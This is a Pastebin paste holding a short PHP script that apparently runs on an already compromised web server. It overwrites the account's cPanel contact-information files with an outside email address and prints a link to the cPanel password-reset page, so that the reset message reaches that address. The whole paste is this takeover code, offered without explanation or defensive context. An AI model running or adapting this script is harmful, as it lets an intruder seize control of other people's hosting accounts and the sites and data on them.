Advertisement
D3F4ULT8778

Untitled

Apr 20th, 2021
33
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. $user = get_current_user();
  2. $site = $_SERVER['HTTP_HOST'];
  3. $ips = getenv('REMOTE_ADDR');
  4. $wr = 'email: handshake-0x01@outlook.com';
  5. $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
  6. fwrite($f, $wr);
  7. fclose($f);
  8. $f = fopen('/home/'.$user.'/.contactinfo', 'w');
  9. fwrite($f, $wr);
  10. fclose($f);
  11. $parm = 'https://'.$site.':2083/resetpass?start=1';
  12. echo "<a href=$parm><center>3iwww<b><h3></a></center> ";
  13. echo "<center>\n USER :D ==> $user</h3></b></center>";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement